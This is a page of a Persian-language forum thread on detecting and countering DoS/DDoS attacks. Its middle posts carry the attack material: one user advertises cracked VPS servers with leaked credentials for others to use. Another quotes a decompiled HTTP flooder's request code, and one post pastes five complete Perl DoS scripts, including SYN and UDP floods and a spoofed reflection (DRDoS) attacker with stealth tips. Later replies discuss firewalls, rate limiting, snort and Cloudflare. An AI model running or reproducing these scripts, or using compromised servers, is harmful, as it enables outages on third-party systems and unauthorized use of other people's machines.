صفحه 2 از 2 اولاول 12
نمایش نتایج 41 تا 54 از 54

نام تاپیک: روشهای شناسایی و مقابله با حملات DOS/DDOS

  1. #41
    کاربر دائمی
    تاریخ عضویت
    فروردین 1393
    محل زندگی
    Mashhad
    پست
    192

    نقل قول: روشهای شناسایی و مقابله با حملات DOS/DDOS

    ضمنا دوستان من توی سایتم برای همین استفاده ها سرور مجازی کرک شده (خودم و تیم کرک مون کرک میکنیم) تست شده میزارم

    در صورتی که میخواین ایدی وی پی اس کرک کنین یا برنامه هایی که نمیخواین روی سیستم اجرا کنید یا دانلود و آپلود سنگین داشتین میتونین از اینها استفاده کنین !

    سرعت اینترنت بالاس برای همین میتونین برای صفحات بازدید خودکار مثل پی سی رنک و ... هم از اینا استفاده کنید :

    Vps های کرک شده رایگان + آپدیت

    فقط باید عضو باشید تا یوزر پس وی پی اس ها رو ببینید ! (اینم فقط به این دلیل هست که افراد ناشی و بی جنبه که روی سرور ها دسکتاپ لاکر میزارن یا پسورد عوض میکنن رو شناسایی کنیم)

  2. #42

    نقل قول: روشهای شناسایی و مقابله با حملات DOS/DDOS

    یعنی اینا سرورهای ملته که پسوردش لو رفته؟
    اونوقت خودشون کجان چرا متوجه نشدن جلوش رو نمیگیرن؟

  3. #43

    نقل قول: روشهای شناسایی و مقابله با حملات DOS/DDOS

    چرا متوجه نشن؟!
    بعد از یه مدتی متوجه میشن و یوزر و پسوورد رو میبندن
    این وی پی اسا برا مدت کوتاه خوبه


    برنامه ی Night Tool که یکی از دوستان گذاشت رو Decompile کردم.پاک پاکه مشکلی نداره میتونید استفاده کنید.سورسشو هم Attach کردم.البته بعضی جا هاش شاید مشکل داشته باشه چون سورس Decompile شدست نه اصلی!
    در ضمن تحت .net freamwork نوشته شده

    کد نویسیش خیلی سادست
    چندتا قسمت داره
    HTTP Flooder
    TCP Flooder
    UDP Flooder
    Slow Loris
    Open Port Checker

    HTTP Flooder که ما بهش احتیاج داریم رو بسیار ساده نوشته
    که البته کلیه ی این نوع حملات کد نویسی ساده ای دارن
    یه HTTP Get Request به تارگت میفرسته با چندتا سوکت TCP
    اینم از HTTP Get Request Code:

                StringBuilder builder = new StringBuilder();
    builder.AppendLine(string.Format("GET /{0} HTTP/1.1", this.pageURI));
    builder.AppendLine(string.Format("Host: {0}", this.host));
    builder.AppendLine("Connection: Keep-Alive");
    builder.AppendLine();
    return builder.ToString();


    همونطور که میبینید این Request توی یه Function گرفته میشه و فرستاده میشه.
    فایل های ضمیمه فایل های ضمیمه

  4. #44
    کاربر دائمی
    تاریخ عضویت
    فروردین 1393
    محل زندگی
    Mashhad
    پست
    192

    نقل قول: روشهای شناسایی و مقابله با حملات DOS/DDOS

    نقل قول نوشته شده توسط eshpilen مشاهده تاپیک
    یعنی اینا سرورهای ملته که پسوردش لو رفته؟
    اونوقت خودشون کجان چرا متوجه نشدن جلوش رو نمیگیرن؟
    با توجه به قوانین هیچ سرور داخلی (ایران) در تاپیک یاد شده یافت نخواهد شد.
    سرور های خارجی هست که به هر دلیل (ضعف در امنیت - عدم اهمیت و ...) از یوزر و پسورد های ساده و رایج استفاده کرده اند.
    میتونید از این سرور ها استفاده کنید و این که تا چه زمانی تضمین پایداری دارند کاملا مربوط به مالک سرور میشود.
    خود بنده از یکی از سرور ها که در تاپیک قرار دادم حدود 3 هفته هست استفاده میکنم!
    چندین بار ادمین هم لاگین بوده بنده هم لاگین بودم و تا به حال نه یوزر حذف شده نه پسورد چنج شده !

    دیداسر های جدید (تحت ویندوز و اسکریپت) به زودی قرار میدم

  5. #45
    کاربر دائمی آواتار SlowCode
    تاریخ عضویت
    آبان 1388
    محل زندگی
    اردبیل
    پست
    2,638

    نقل قول: روشهای شناسایی و مقابله با حملات DOS/DDOS

    دوست عزیز لطفا فایل اجرایی نزارین!
    قانون شماره 10
    مطرح کردن و پاسخ به مباحثی که به هک و کرک ( از دید منفی ) و مسائلی که باعث آزار و اذیت دیگران شود اکیداً ممنوع است.
    به سورس هم میتونن گیر بدن.
    حیف اینگونه بحث هاست! یهو دیدی مدیران اومدن تاپیکو بستن!

  6. #46
    کاربر دائمی
    تاریخ عضویت
    فروردین 1393
    محل زندگی
    Mashhad
    پست
    192

    نقل قول: روشهای شناسایی و مقابله با حملات DOS/DDOS

    نقل قول نوشته شده توسط SlowCode مشاهده تاپیک
    دوست عزیز لطفا فایل اجرایی نزارین!

    به سورس هم میتونن گیر بدن.
    حیف اینگونه بحث هاست! یهو دیدی مدیران اومدن تاپیکو بستن!
    با تشکر از شما
    اما تاپیک مرجع و بسیار مفیدی خواهد شد!
    چشم من دیگه اجرایی نمیزارم
    اسکریپت تحت وب و سورس تحت ویندوز میزارم فقط ! ممنونم

  7. #47

    نقل قول: روشهای شناسایی و مقابله با حملات DOS/DDOS

    نقل قول نوشته شده توسط SlowCode مشاهده تاپیک
    دوست عزیز لطفا فایل اجرایی نزارین!

    به سورس هم میتونن گیر بدن.
    حیف اینگونه بحث هاست! یهو دیدی مدیران اومدن تاپیکو بستن!
    اگه بخوایم به دید منفی نگاه کنیم که ساده ترین اطلاعات رو هم نباید بزاریم
    اگه قراربود اینجوری باشه علم هم خطراتش زیادتره هک هست پس اونم نباید ترویج بشه هرچند که هک و کامپیوتر یک نوع علم هست

  8. #48
    کاربر دائمی
    تاریخ عضویت
    فروردین 1393
    محل زندگی
    Mashhad
    پست
    192

    نقل قول: روشهای شناسایی و مقابله با حملات DOS/DDOS

    تاپیک به مدته خوابه !!!!

    چند تا اسکریپت پرل دیداس برای بررسی توسط اساتید و پیدا کردن روش مقابله !

    1
    #!/usr/bin/perl 
    use IO::Socket;
    if(!defined($ARGV[2])){
    print "Dos Target : ";
    $host = <STDIN>;
    chop ($host);
    print "Port : ";
    $port = <STDIN>;
    chop ($port);
    print "SYN Requests to send : ";
    $num = <STDIN>;
    chop ($num);
    }
    if(defined($ARGV[2])){
    $host = $ARGV[0];

    $port = $ARGV[1];
    $num = $ARGV[2];
    }
    for ($i=0; $i<$num; $i++)
    {
    $len = length $form;
    $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "Can't Connect,It May The Server Dose
    d?.\n";
    syswrite STDOUT, "SYN Request: $i\n";
    }

    print "\n\nEnd Of NitStorm\n\n\n";
    print "Press Enter To Exit...";
    $end = <STDIN>;

    chop ($end);


    2
    #!/usr/bin/perl
    use LWP::Simple;
    print q{
    ================================================== ===============================
    ################################################## ###############################
    ================================================== ===============================
    ######################## Frist Name Of The God ########################
    #################### Quantum Digital Security Team ###################
    ################### Pri8 dDoSer Script (Bw ****er) ####################
    ########################## Coded By Pejvak ###########################
    ================================================== ===============================
    ################################################## ###############################
    ================================================== ===============================
    };
    $ARGC=@ARGV;
    print("Plz Insert File On The Host Victem Example(http://Qn2.Org/file.rar)\n");
    print("Address File = ");
    $addressfile=(<stdin>);
    chop ($addressfile);
    print("\nPlz Insert Requast Number Example( 20 )\n");
    print("Number = ");
    $timenumber=(<stdin>);
    chop ($timenumber);
    print("\nDDoS Started!!!");
    $i=0;
    while($i<$timenumber){
    $i=$i+1;
    getstore($addressfile,rand(10).".Qn2");
    print("\n@");
    }
    print("\n Check Ping Site Vistem ");
    print("Yes To Check Or No To Exit = ");
    $yn=(<stdin>);
    chop ($yn);
    if($yn=="yes"){
    system('ping '."$addressfile");
    }
    print("\n===========================Done========== =================\n");
    print("=========================================== ====================\n");
    print("================ Quantum Digital Security Team ==================\n");
    print("============================ By Pejvak ============================\n");
    print("========= Special TnX For Nashenas , Neo , R3d.W0rm , Ali57 , Cair3x =========\n");


    3
    #!/usr/bin/perl

    use Socket;

    $ARGC=@ARGV;

    if ($ARGC !=3) {
    printf "\n";
    printf " --== PRIV8 DDOSER TOOL==-- \n\n";
    printf "$0 <ip> <port> <time>\n\n";
    printf "Example : <ip> <port> 0\n";
    printf "Example : <ip> <port> 2 \n\n";
    exit(1);
    }

    my ($ip,$port,$size,$time);
    $ip=$ARGV[0];
    $port=$ARGV[1];
    $time=$ARGV[2];

    socket(SOCK1, PF_INET, SOCK_DGRAM, 17);
    socket(SOCK2, PF_INET, SOCK_RAW, 2);
    socket(SOCK3, PF_INET, SOCK_RAW, 1);
    socket(SOCK4, PF_INET, SOCK_RAW, 6);
    $iaddr = inet_aton("$ip");

    printf "Attack Start ... $ip\n";

    if ($ARGV[1] ==0 && $ARGV[2] ==0) {
    goto randpackets;
    }

    if ($ARGV[1] !=0 && $ARGV[2] ==0) {
    goto packet;
    }

    if ($ARGV[1] ==2 && $ARGV[2] ==2) {
    goto randpacket;
    }


    packet:
    for(;;) {
    $size=$rand x $rand x $rand;
    send(SOCK1, 0, $size, sockaddr_in($port, $iaddr));
    send(SOCK2, 0, $size, sockaddr_in($port, $iaddr));
    send(SOCK3, 0, $size, sockaddr_in($port, $iaddr));
    #send(SOCK4, 0, $size, sockaddr_in($port, $iaddr));
    }


    randpacket:
    for(;;) {
    $size=$rand x $rand x $rand;
    $port=int(rand 65000)+1;
    for($i = 3; $i <= 255; $i++) {
    next if $i == 6;
    socket(SOCK5, PF_INET, SOCK_RAW, $i) or next;
    send(SOCK5, 0, $size, sockaddr_in($port, $iaddr));
    }
    }

    randpackets:
    for(;;) {
    $size=$rand x $rand x $rand;
    $port=int(rand 65000) +1;
    send(SOCK1, 0, $size, sockaddr_in($port, $iaddr));
    send(SOCK2, 0, $size, sockaddr_in($port, $iaddr));
    send(SOCK3, 0, $size, sockaddr_in($port, $iaddr));
    #send(SOCK4, 0, $size, sockaddr_in($port, $iaddr));
    }


    4
    #!/usr/bin/perl

    #
    # ~written by whoppix (c) 2007~
    # This Piece of software may be freely (re-)distributed under the Terms of the LGPL.
    # for a short usage type ./script --help
    # this program requires: perl, Net::RawIP (depends on libpcap), Getopt::Long
    # (which should be shipped along with your perl core distribution)
    # if you want to gain a deeper understanding about how DRDoS works, have a look at:
    # http://www.grc.com/dos/drdos.htm
    # This program is written for testing and researching purposes only.
    #

    use warnings;
    use strict;
    use Net::RawIP;
    use Getopt::Long;

    my $verbose = '0';
    my $syn_count = '1';
    my $victim = '127.0.0.1';
    my @lists = ();
    my $net = new Net::RawIP;

    GetOptions(
    'verbose+' => \$verbose,
    'syn_count=s' => \$syn_count,
    'list=s' => \@lists,
    'help' => \&usage,
    );
    $victim = shift @ARGV;
    if ( !$victim ) {
    die "Error: No target specified, use --help\n";
    }
    if ( !@lists ) {
    die "Error: You have to specify at least one reflector list, use --help\n";
    }
    foreach my $file (@lists) {
    if ( !-e $file ) {
    die "File does not seem to exist: $file\n";
    }
    }
    print "Starting attack on target $victim.\n";
    print "press Ctrl-C to interrupt at any time.\n" if $verbose >= 1;
    while (1) {
    foreach my $listfile (@lists) {
    print "Loading reflector file: $listfile\n" if $verbose >= 1;
    open( my $list, "<", $listfile )
    or die "Error opening file for reading: $listfile\n";
    while (<$list>) {
    chomp;
    if ( check_format($_) ) {
    my $counter = $syn_count;
    my $reflector = $_;
    my ( $ip, $port ) = split( ':', $reflector );
    print "reflector ip: $ip, reflector port: $port\n"
    if $verbose > 1;
    for ( my $counter = $syn_count; $counter > 0; $counter-- ) {
    print "attacking using reflector: $reflector\n"
    if $verbose > 1;
    my $rand = int( rand(65535) );
    while ( $rand == 0 ) {
    print
    "random number calculated for SRCPORT was zero, retrying...\n"
    if $verbose > 1;
    $rand = int( rand(65535) );
    }
    print "random port used for SRCPORT: $rand\n"
    if $verbose > 1;
    $net->set(
    { ip => {
    saddr => $victim,
    daddr => $ip,
    },
    tcp => {
    source => $rand,
    dest => $port,
    syn => 1,
    },
    }
    );
    $net->send();
    }
    }
    else {
    print
    "mirror \"$_\" not in correct format (ip:port) omitting...\n"
    if $verbose >= 1;
    }
    }
    }
    }

    sub usage {
    print "\nusage:\n\n";
    print "--help\t\t: youre reading it\n";
    print
    "--verbose\t: makes the script more verbose. can be used several times to increase verbosity.\n";
    print "--list\t\t: used to specify a reflectorlist.\n";
    print
    "\t\texample: ./script --list list1.txt --list list2.txt --list list3.txt 127.0.0.1\n";
    print
    "\t\tthe more (and longer) lists you have, the better will the result be, and the more stealth you will gain.\n";
    print
    "--syn_count\t: used to set the syn_count to a special value. default is 1.\n";
    print "\t\tdon't use too much - that would decrease your stealth. Default (and that should be fine) is 1.\n";
    print "\nGeneral information:\n";
    print "The usage of multiple lists can increase your stealth.\n";
    print "The more Mirrors or \"reflectors\" you use, the better will the result be.\n";
    print "The better the bandwidth of your mirrors is, the better will the result be.\n";
    print "Generally spoken is the bandwidth you use to flood your victim amplified by the factor 3-4.\n\n";
    die "\n";
    }

    sub check_format { # a function to check the ip:port format.
    no warnings;
    my $address = shift;
    my ( $ip, $port ) = split( ':', $address );
    my @octets = split( '\.', $ip );

    if ( $port < 1 or $port > 65535 ) {
    print "port $port too high or low\n" if $verbose >= 1;
    return;
    }
    if ( @octets != 4 ) {
    print "ip has invalid number of octetts: $ip\n" if $verbose >= 1;
    return;
    }
    foreach my $octet (@octets) {
    if ( $octet < 0 or $octet > 255 ) {
    print "octet is invalid: $octet\n" if $verbose >= 1;
    return;
    }
    }
    print "VALID!\n" if $verbose > 1;
    return 1;
    }


    5
    #!/usr/bin/perl
    use IO::Socket;
    print q(

    ########--->>> DATA ir D.O.S Attacker (V 1.0.0) <<<---########

    Usage : Perl named.pl <host> <port>
    Examp : Perl ddoser.pl 127.0.0.1 80
    );
    my $host= shift;
    my $port= shift;
    if ($host!=null){
    printf ("\n\t\t . . . . . . Attack Started . . . . . . .\n\n\n");
    sleep (2);
    for ($i=0; ;$i--)
    {
    $len = length $form;
    $get = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || redo;
    syswrite STDOUT, ".";
    }
    }
    else
    {exit(0);}


  9. #49
    کاربر دائمی آواتار SlowCode
    تاریخ عضویت
    آبان 1388
    محل زندگی
    اردبیل
    پست
    2,638

    نقل قول: روشهای شناسایی و مقابله با حملات DOS/DDOS

    چند تا اسکریپت پرل دیداس برای بررسی توسط اساتید و پیدا کردن روش مقابله !
    روش مقابله با اینگونه حملات فراتر از php هست!
    آقای eshpilen ایکاش این بحث رو تو یه تالار مناسب مطرح میکردین.
    تشخیص این حملات به عهده فایروال هست! با php ما فقط به پورت 80 دسترسی داریم!
    ولی این حملات انواع پورت ها رو مورد حمله قرار میدن، udp, ftp, ...

    حتی اگه بخواییم با php بنویسیم باز اشتباهه! برای مثال میاییم از این کد استفاده میکنیم:
    if (!isset($_SESSION)) {
    session_start();
    }
    // anti flood protection
    if($_SESSION['last_session_request'] > time() - 2){
    // users will be redirected to this page if it makes requests faster than 2 seconds
    header("location: http://site.com");
    exit;
    }
    $_SESSION['last_session_request'] = time();

    خب اینجا باز هم از منابع سرور استفاده میشه!
    پس بهترین راه استفاده از فایروال و iptables هست که بحثشون از حیطه php خارج هست.
    با همین ufw میتونیم تا حدودی جلوی dos رو بگیریم.

  10. #50

    نقل قول: روشهای شناسایی و مقابله با حملات DOS/DDOS

    نقل قول نوشته شده توسط SlowCode مشاهده تاپیک
    حتی اگه بخواییم با php بنویسیم باز اشتباهه! برای مثال میاییم از این کد استفاده میکنیم:
    if (!isset($_SESSION)) {
    session_start();
    }
    // anti flood protection
    if($_SESSION['last_session_request'] > time() - 2){
    // users will be redirected to this page if it makes requests faster than 2 seconds
    header("location: http://site.com");
    exit;
    }
    $_SESSION['last_session_request'] = time();
    خب روبات طرف که لزوما نمیاد هر بار کوکی سشن رو هم که شما ست کردید ارسال کنه!
    در نتیجه هر بار انگار درخواست اوله و هیچ سشنی از قبل وجود نداره که زمان درخواست قبلی توش باشه که بشه با زمان درخواست فعلی مقایسه کرد.
    ولی البته در موارد خاصی که سشن برای انجام عملیات مورد نظر حتما باید وجود داشته باشه میشه از اینطور ایده ها استفاده کرد.

    روش مقابله با اینگونه حملات فراتر از php هست!
    آقای eshpilen ایکاش این بحث رو تو یه تالار مناسب مطرح میکردین.
    تشخیص این حملات به عهده فایروال هست! با php ما فقط به پورت 80 دسترسی داریم!
    ولی این حملات انواع پورت ها رو مورد حمله قرار میدن، udp, ftp, ...
    ...
    خب اینجا باز هم از منابع سرور استفاده میشه!
    پس بهترین راه استفاده از فایروال و iptables هست که بحثشون از حیطه php خارج هست.
    با همین ufw میتونیم تا حدودی جلوی dos رو بگیریم.
    آره منم که گفتم همهء این حملات رو نمیشه در سطح برنامه جلوشون رو گرفت؛ به دلیل اینکه خیلی هاش اصلا در سطح برنامه های برنامه نویسان عادی وب نیست، و دیگر بخاطر اینکه ممکنه در سطح برنامه اصلا کارایی جهت جلوگیری بهینه نباشه و باید برای کارایی بهتر در سطح پایین تر یا با ابزارهای دیگری جلوگیری کرد.
    ولی بهتر دیدم بصورت کلی به این حملات بپردازیم تا انواع و ابعادش برای بقیه مشخص بشه و بحث آموزشی کامل باشه.
    اما مواردی هم بالاخره هست که شناسایی و جلوگیری در سطح برنامه های وب ممکن یا حتی بهتره؛ خواستم اون موارد رو هم در این تاپیک مطرح کنیم.

  11. #51

    نقل قول: روشهای شناسایی و مقابله با حملات DOS/DDOS

    سلام
    باور کنین این تاپیک رو خوندم دیگه از طراحی وب نا امید شدم.

  12. #52

    نقل قول: روشهای شناسایی و مقابله با حملات DOS/DDOS

    ی سوالی واسم پیش اومده:
    آیا مدیران هاست ها یا افراد و شرکت هایی که هاست ارائه میدن نباید جلوی این حمله هارو بگیرن؟
    این حملات مربوط به سرور میشه:
    و برنامه نویس نباید زیاد درگیرش بشه.
    البته این نظر منه

  13. #53

    نقل قول: روشهای شناسایی و مقابله با حملات DOS/DDOS

    نگاهی به پروژه های قدرتمندی مثل snort.org داشته باشید. من ازش بسیار خوب جواب گرفتم. چرخ رو دوباره اختراع نکنیم .

  14. #54

    نقل قول: روشهای شناسایی و مقابله با حملات DOS/DDOS

    نقل قول نوشته شده توسط olampiad مشاهده تاپیک
    ی سوالی واسم پیش اومده:
    آیا مدیران هاست ها یا افراد و شرکت هایی که هاست ارائه میدن نباید جلوی این حمله هارو بگیرن؟
    این حملات مربوط به سرور میشه:
    و برنامه نویس نباید زیاد درگیرش بشه.
    البته این نظر منه
    از کلادفلار cloudflare.com استفاده کنید
    90 درصد حمله های DDOS را شناسایی و مصدود میکند ...

صفحه 2 از 2 اولاول 12

تاپیک های مشابه

  1. چند سوال در مورد مقابله با حملات xss
    نوشته شده توسط neda555 در بخش ASP.NET Web Forms
    پاسخ: 7
    آخرین پست: جمعه 18 مرداد 1392, 22:47 عصر
  2. حملات DOS
    نوشته شده توسط evilc0d3r در بخش امنیت در شبکه
    پاسخ: 12
    آخرین پست: شنبه 11 آذر 1391, 20:05 عصر
  3. سوال: مقابله با حملات xss
    نوشته شده توسط mohsen.nsb44 در بخش ASP.NET Web Forms
    پاسخ: 20
    آخرین پست: چهارشنبه 16 فروردین 1391, 14:41 عصر
  4. مقابله با حملات sql injection
    نوشته شده توسط bps20590 در بخش سایر پایگاه‌های داده
    پاسخ: 2
    آخرین پست: سه شنبه 11 خرداد 1389, 00:02 صبح
  5. سوال: مقابله با حملات سر ریز بافر
    نوشته شده توسط yas111 در بخش امنیت در شبکه
    پاسخ: 3
    آخرین پست: دوشنبه 20 آبان 1387, 15:35 عصر

قوانین ایجاد تاپیک در تالار

  • شما نمی توانید تاپیک جدید ایجاد کنید
  • شما نمی توانید به تاپیک ها پاسخ دهید
  • شما نمی توانید ضمیمه ارسال کنید
  • شما نمی توانید پاسخ هایتان را ویرایش کنید
  •